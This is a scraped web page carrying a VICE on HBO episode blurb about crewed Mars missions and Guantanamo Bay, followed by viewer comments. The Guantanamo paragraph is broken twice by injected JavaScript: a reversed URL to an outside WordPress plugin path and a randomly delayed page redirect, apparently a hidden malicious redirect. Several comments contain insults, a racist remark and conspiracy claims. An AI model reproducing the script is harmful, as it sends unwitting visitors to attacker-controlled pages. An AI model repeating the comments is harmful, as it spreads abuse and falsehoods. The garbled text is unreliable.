The New Space Race & Closing Gitmo (VICE on HBO: Season 4, Episode 18)

Decades after the Apollo missions, a new era of manned spaceflight is dawning — and this time, the destination is Mars. NASA and a growing community of private companies have set their sights on the Red Planet, and they’re developing the technologies that will actually get us there. VICE reports on the preparations for humanity’s next great adventure.

The American prison at Guantanamo Bay, Cuba, is one of the most controversial issues of the post-9/11 era. President Obama promised toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to close the facility, but months from the end of his presidency the facility remains open — and the reality of life there remains a mystery. VICE meets with ex-detainees who survived Gitmo, and the general who built it in the first place, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to find out what really happens behind the camp’s walls.

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34 thoughts on “The New Space Race & Closing Gitmo (VICE on HBO: Season 4, Episode 18)”

  1. Reagan Pup says:

    Nobody talks about the fact that Mars is geologically dead and therefore would have no magnetic field to protect life. air, water from solar radiation. Are people just ignoring this?

  2. Daniel Hrebenak says:

    Why's the reporter with the glasses such a douche?

  3. Fishin Fool 928 says:

    When they started shaking around I started laughing

  4. lost Looking for a way says:

    elon musk i trust.

  5. OVVlogs Everyday Life says:

    why cant they go to the moon first!?

  6. Nope Nope says:

    White slave masters are to blaim for all this craziness….white people are cancer

  7. TheKickingGuy says:

    9:35 yeah o bet he is a Virgin lol

  8. Tomas Tur says:

    i get we might find one cell life in mars, but really if we dont find it, is it that wrong to bring life from earth? we are part of nature, are we the steping stone for panspermia? we know there are life that could survive in mars.

  9. MWYANT19 says:

    5:18 wtf??????

  10. MegaChick13 says:

    Are they fucking high

  11. Korben Dallas says:

    The left hates America!

  12. hey you says:

    They are just going to fuck up another planet. I dont want to sound cynical but I think we need to go extinct at some point. They might be careful to protect the planet at first but newer generations just wont give a shit. Self entitled ass hats who have not been faced with most certain ever impending doom will build their poison emitting buildings. They will make their individual and unnecessary vehicles to transfer them from one relatively close destination to another. Its sad but true as James Hetfield once said.

  13. Asher Scott says:

    Isn't it weird that we think innocent animals kidnapped from the wild belong in a "zoo" but mass murders deserve better?

  14. Wykydtronik says:

    13:20 LEL Elon Musk is going to beat the snail called NASA what was this recorded in 2014? hahaha

  15. MyCold DeadHands says:

    Looks like a cult to me

  16. cavespoint010nx says:

    Starting to add more ads on YouTube videos because you get more views here than on hbo?

  17. MonkeyButt69 says:

    The goverment doesn't want people leaving earth because then they will start losing their grip on society.

  18. MonkeyButt69 says:

    What's the point of sending people to mars when the government already has aircraft that can travel light years into the universe?

  19. MonkeyButt69 says:

    Its still probably better treatment then any American POW would even dream of in the middle East, non the less it still is a shitty place that either needs to be regulated or shut down.

  20. MonkeyButt69 says:

    For you to get orders to Gitmo you must have really pissed someone off.

  21. AdmiralTrevMan says:

    keep gitmo, end terrorism, secure the borders!

  22. Abhishek Singh says:

    Music at 10:16 (richard branson announcement part) anyone ????….TIA !!!

  23. teopini says:

    19:59 – LOL! I like how the camera turns to her like: "Triggered!!"

  24. Paul Sack says:

    "If you wanna learn more about guantanamo bay, the last place you should go is guantanamo bay"


  25. John Goodman says:

    thanks obama…

  26. COLLIN GAMBILL says:

    Team human

  27. manrightchea says:

    You know honestly it annoys me to even hear anything about Gitmo, not because I don't think people have legitimate grievances, I understand that they do. It angers me because it seems like both society and the United Nations have no concerns about freeing the poor, poor souls of the North Korean torture camps.

    If you want to learn what true evil is and what true hell is just do some research on the North Korean "kwanliso". You can start with a documentary called Access to Evil.

    While my intention is not to try to justify the existence of Gitmo, there is nothing anyone can show that wouldn't make Gitmo look like the Hamptons compared to the North Korean torture camps.

    I am going to warn you that if you watch that documentary, and if you pursue that knowledge, it will deeply affect you, it will likely change you forever. The world has stopped caring.
    I honestly believe the North Korean torture camps to be the most horrifying and inhumane existences is in the history of mankind. Is it sickening how it is allowed in this modern day and age.

  28. Vijay Mishra says:

    You shouldn't do these and stick to Middle-East. It's a serious advise. 🙂

  29. TheUnatuber says:

    One-third of Earth's atmosphere??? Try ONE PERCENT!

  30. Jaydeezy says:

    the best part is to see who has the best comment for this video. lmao

  31. Yamaha R1 says:

    the only thing close we are getting to mars are those chocolate bars

  32. Grandpa Gropes-A-Lot says:

    originally on this first story i was like ok they just like mars little weird but whatever, aaaaaand now they are trying to get rid of the curses evil spirits residing in their body by moving limbs.

  33. bigky226 says:

    God I hate branson that smug fuck, lose the SJW broad

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